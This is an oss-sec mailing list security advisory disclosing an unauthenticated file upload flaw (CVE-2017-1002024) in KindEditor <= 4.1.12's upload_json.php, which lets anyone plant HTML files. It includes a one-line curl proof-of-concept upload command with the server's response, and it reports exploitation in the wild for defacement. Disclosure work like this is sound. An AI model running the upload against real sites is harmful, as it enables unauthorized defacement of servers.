oss-sec mailing list archives
File upload vulnerability in Kindeditor <= 4.1.12
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 05 Jul 2017 11:22:54 -0400
Title: File upload vulnerability in Kindeditor <= 4.1.12 Author: Larry W. Cashdollar, @_larry0 Date: 2017-06-14 CVE-ID:[CVE-2017-1002024] Download Site: http://kindeditor.org/ https://github.com/kindsoft/kindeditor/ Vendor: KindSoft Vendor Notified: 2017-06-15 Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=195 Description: KindEditor is a lightweight, Open Source(LGPL), cross browser, web based WYSIWYG HTML editor. KindEditor has the ability to convert standard text areas to rich text editing. Vulnerability: It appears there is a remote file upload vulnerability in kindeditor<= 4.1.12 specifically in kindeditor/php/upload_json.php. The file doesn't sanitize user input or check that a user should be uploading files to the system. It appears it doesn't allow .php, phtml, shtml or other executable extensions. You can upload .html and call it as its uploaded to the web server path. But no server side code exec. Exploit Code: • A simple curl request to kindeditor/php/upload_json.php?dir=file with the data filename=test.html set via POST request is all that's require to exploit this vulnerability: • • $ curl -F "imgFile=@test.html" http://example.com/kindeditor/php/upload_json.php?dir=file • • {"error":0,"url":"/kindeditor/php/../attached/file/20170613/20170613203236_37481.html"} This vulnerability is being actively exploited in the wild to deface sites. The software vendor has not responded to the issue I posted three weeks ago. https://github.com/kindsoft/kindeditor/issues/249
Current thread:
- File upload vulnerability in Kindeditor <= 4.1.12 Larry W. Cashdollar (Jul 05)